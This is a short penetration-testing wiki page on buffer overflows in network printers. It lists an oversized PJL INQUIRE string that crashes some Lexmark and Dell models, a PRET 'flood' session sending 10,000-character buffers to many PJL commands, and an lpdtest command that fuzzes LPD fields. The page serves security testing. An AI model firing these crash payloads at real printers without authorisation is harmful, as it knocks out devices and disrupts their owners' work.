2.2 KiB
Buffer Overflows
PJL
Various_ Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see CVE-2010-0619) and sending about 3.000 characters as the SET argument to the Dell 1720n crashes the device:
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
You can check for Buffer Overflows using PRET:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
LPD daemon
It allows multiple user-defined vectors like_ jobname, username or hostname_, which may not be sufficiently protected. Several vulnerabilities related to this malfunction has been already discovered.
A simple LPD fuzzer to test for buffer overflows can be created using the lpdtest tool **included **in PRET. The in argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):
./lpdtest.py printer in "`python -c 'print "x"*150'`"
You can find more information about these attacks in http://hacking-printers.net/wiki/index.php/Buffer_overflows